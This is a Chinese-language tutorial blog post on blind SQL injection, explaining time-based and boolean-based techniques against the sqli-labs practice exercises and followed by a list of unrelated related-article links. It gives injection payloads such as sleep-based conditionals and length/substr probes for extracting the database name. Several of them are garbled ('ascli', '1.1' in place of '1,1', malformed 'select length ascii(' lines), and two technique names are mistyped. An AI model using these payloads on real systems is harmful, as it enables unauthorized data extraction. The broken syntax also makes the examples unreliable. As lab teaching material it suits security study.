SQL注入实战:盲注

盲注:

1、当攻击者利用SQL注入漏洞进行攻击时,有时候web应用程序会显示,后端数据库执行SQL查询返回的错误信息,这些信息能帮助进行SQL注入,但更多时候,数据库没有输出数据web页面,这是攻击者会查询一系列的true或false问题,或者基于时间判断的问题,强制从数据库获取数据。

2、Blind SQL(盲注)是注入攻击的其中一种,向数据库发送true或false这样的问题,并根据应用程序返回的信息判断结果,这种攻击的出现是因为应用程序配置为只显示常规错误,并不显示sql语句的错误,这种情况并没有解决SQL注入存在的代码问题。

3、盲注可以分为基于不二的盲注和基于事件的盲注

一:基于时间的盲注

1、延时注入,用的最多的注入

2、常用的判断语句:

' and if(1=0,1,sleep(10)) --+

" and if(1=0,1,sleep(10)) --+

) and if(1=0,1,sleep(10)) --+

') and if(1=0,1,sleep(10)) --+

") and if(1=0,1,sleep(10)) --+

利用if(条件,0,1)函数,当条件为真返回0,假则返回1

sqli-lab 9-10实验就是基于时间的盲注

?id=1' and if(ascli(substr(database(),1.1))=115,sleep(5),1)--+

二:基于布尔的盲注

基于布尔型的盲注,我们通常采用下面的方法猜解字符串,

select length(database());

select substr(database(),1,1);

select length ascii(substr(database(),1,1);

select length ascii(substr(database(),1,1)>N;

select length ascii(substr(database(),1,1)=N;

select length ascii(substr(databa

se(),1,1)<N;

输入:?id=1

输入:?id=1'

输入:?id=1' and length(database())=8 --+ (查看数据库的长度)

把=8改成=9,会发现没有了 (说明数据库长度为8)

相关推荐
专业软件系统开发6 小时前
药品说明书查询系统源码 本地数据库 PHP版本
数据库·查询系统源码·说明书查询源码
冉冰学姐10 小时前
SSM足球爱好者服务平台i387z(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库·ssm 框架·足球爱好者服务平台
大飞记Python10 小时前
部门管理|“编辑部门”功能实现(Django5零基础Web平台)
前端·数据库·python·django
清风66666612 小时前
基于单片机的智能收银机模拟系统设计
数据库·单片机·毕业设计·nosql·课程设计
资深低代码开发平台专家12 小时前
PostgreSQL 18 发布
数据库·postgresql
与衫13 小时前
在 VS Code 里看清你的数据流向:Gudu SQL Omni 实测体验
数据库·sql
Element_南笙14 小时前
吴恩达新课程:Agentic AI(笔记2)
数据库·人工智能·笔记·python·深度学习·ui·自然语言处理
长安城没有风14 小时前
从入门到精通【Redis】Redis 典型应⽤ --- 分布式锁
数据库·redis·分布式
Ytadpole14 小时前
MySQL 数据库优化设计:优化原理和数据库表设计技巧
数据库·mysql·优化·索引·查询·检索·表设计